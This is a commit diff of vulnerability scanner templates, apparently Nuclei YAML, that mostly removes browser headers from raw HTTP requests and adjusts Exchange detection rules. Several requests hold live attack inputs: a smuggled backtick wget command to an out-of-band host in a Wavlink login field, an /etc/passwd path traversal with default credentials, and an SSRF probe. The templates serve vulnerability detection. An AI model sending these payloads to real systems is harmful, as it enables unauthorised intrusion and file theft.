more updates
parent
3fe4bc5206
commit
3f803deb28
|
@ -12,7 +12,6 @@ requests:
|
|||
- |
|
||||
POST /rest/issueNav/1/issueTable HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
|
||||
Connection: Close
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||
X-Atlassian-Token: no-check
|
||||
|
|
|
@ -14,16 +14,12 @@ requests:
|
|||
- |
|
||||
POST /cgi-bin/login.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://{{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
|
||||
newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
|
|
|
@ -15,8 +15,6 @@ requests:
|
|||
POST /dfsms/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Connection: close
|
||||
Content-Length: 66
|
||||
|
||||
|
|
|
@ -14,8 +14,6 @@ requests:
|
|||
GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft
|
||||
reference: |
|
||||
- https://proxylogon.com/#timeline
|
||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||
|
|
|
@ -18,24 +18,12 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic YWRtaW46YWRtaW4=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -1,23 +0,0 @@
|
|||
id: exchange-login
|
||||
|
||||
info:
|
||||
name: Microsoft Exchange login page
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6739
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/owa/auth/logon.aspx'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Exchange Log In</title>'
|
||||
- '<title>Microsoft Exchange - Outlook Web Access</title>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -15,7 +15,6 @@ requests:
|
|||
headers:
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Language: en-US,en;q=0.9,hi;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -2,30 +2,31 @@ id: microsoft-exchange-server-detect
|
|||
|
||||
info:
|
||||
name: Microsoft Exchange Server Detect
|
||||
author: pikpikcu
|
||||
author: pikpikcu,dhiyaneshDK
|
||||
severity: info
|
||||
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
|
||||
description: |
|
||||
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
|
||||
description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
|
||||
tags: microsoft,exchange,tech
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/owa/auth/logon.aspx"
|
||||
|
||||
matchers-condition: and
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
|
||||
part: all
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Exchange Log In</title>'
|
||||
- '<title>Microsoft Exchange - Outlook Web Access</title>'
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- X-Owa-Version
|
||||
- X_Owa_Version
|
||||
|
|
Loading…
Reference in New Issue